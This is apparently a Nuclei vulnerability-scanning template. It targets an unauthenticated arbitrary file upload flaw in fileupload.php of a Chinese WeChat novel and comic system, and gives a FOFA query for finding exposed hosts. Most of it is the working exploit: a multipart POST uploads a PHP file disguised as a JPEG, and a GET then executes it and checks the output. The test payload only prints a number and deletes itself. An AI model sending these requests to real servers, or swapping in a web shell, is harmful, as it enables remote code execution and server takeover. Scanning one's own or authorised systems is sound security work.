http:
    - raw:
        - |
          POST /Public/webuploader/0.1.5/server/fileupload.php HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
          Content-Type: multipart/form-data; boundary=d0b7a0d40eed0e32904c8017b09eb305

          --d0b7a0d40eed0e32904c8017b09eb305
          Content-Disposition: form-data; name="file"; filename="{{username}}.php"
          Content-Type: image/jpeg

          <?php print(1111*2222);unlink(__FILE__);?>
          --d0b7a0d40eed0e32904c8017b09eb305--
    - matchers:
        - part: body
          type: word
          words:
            - "2468642"
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /Public/webuploader/0.1.5/server/upload/{{username}}.php HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
id: wxxiaoshuo-fileupload_php-File-upload
info:
    author: Superhero
    description: |-
        fofa: body="/Public/home/mhjs/jquery.js"
        微信公众号小说漫画系统 fileupload.php 接口存在任意文件上传漏洞，未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
    name: 微信公众号小说漫画系统 fileupload.php 任意文件上传漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247487947&idx=1&sn=883e0169fe69153d7029988e0b6ed422&chksm=c267a4f8f5102deed8f261825348fd278726ad5412cd406f8b60dacfcf6c6e9f30c77b3fc6d8&token=48786214&lang=zh_CN#rd
    severity: high
    tags:
        - jQuery
variables:
    username: '{{to_lower(rand_base(6))}}'
